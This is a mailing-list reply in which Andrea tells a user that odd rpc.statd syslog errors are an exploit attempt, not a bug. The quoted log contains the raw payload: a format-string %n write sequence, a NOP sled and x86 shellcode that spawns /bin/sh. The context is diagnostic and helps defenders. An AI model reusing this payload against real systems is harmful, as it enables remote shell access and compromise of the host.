Brock Murch wrote: > I have been getting this error every so often in the syslog: > > Is this a nfs-common bug? or a syslogd bug? > > running: > > Linux brockwell 2.2.17 #2 Thu Sep 14 06:08:37 EDT 2000 i486 unknown > > all packages from the stable upgrade of that time.
To me this seems an exploit attempt, all the <90> translate with a nop in x86 asm... > Jan 18 19:16:45 brockwell > Jan 18 19:16:45 brockwell syslogd: Cannot glue message parts together > Jan 18 19:16:45 brockwell 173>Jan 18 19:16:45 /sbin/rpc.statd[165]: > gethostbyname error for ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF> > <BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n<90> > > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> > > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> > [...] > > > f<CD> > Jan 18 19:16:45 brockwell > <C7>^F/bin<C7>F^D/shA0<C0><88>F^G<89>v^L<8D>V^P<8D>N^L<89><F3><B0>^K<CD><80><B0>^A<CD><80><E8>^?<FF><FF> > ...look the row above, "/bin/sh", not a bug in your daemon, instead a clear attempt to spawn a shell, probably with a buffer-overflow. Andrea
